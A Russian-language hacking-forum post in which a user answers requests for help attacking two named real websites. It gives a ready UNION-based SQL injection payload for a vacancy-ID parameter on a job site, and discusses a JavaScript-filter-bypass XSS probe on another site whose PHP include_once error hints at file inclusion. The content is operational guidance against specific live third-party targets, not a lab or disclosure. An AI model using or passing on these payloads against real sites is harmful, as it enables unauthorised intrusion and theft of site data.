|
Познающий
Регистрация: 31.01.2007
Сообщений: 88
С нами:
10145068
Репутация:
453
|
|
Сообщение от ubi
Прошу помощи
http://stomjob.ru/index.php?sub=search_vacbyid
В поле ID вакансии подставляем '
Получаем Error You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'' at line 1
Помогите подобрать поля
http://stomjob.ru/index.php?sub=show_vacancybyid
POST:
Код:
vacby_id=1 union select 1,version(),3,4,5,6,7,8,9,0,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26-- 1
Либо можно вбить
Код:
1 union select 1,version(),3,4,5,6,7,8,9,0,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26-- 1
В поле поиска вакансии
Сообщение от None
Код:
http://ontarioworld.ru/usercp/store/prem.php?p=javajavascriptscript:alert%28%20String. fromCharCode%28120,115,115%29%29
Может мне ктонить разяснить, что сделать здесь дальше ? При этом запросе надо посмотреть внимательно на ошибку:
Код:
Warning: include_once(store/javajavascriptscript:alert(String.fromCharCode(120,115,115)).php
Где текст ошибки говорит сам за себя.
|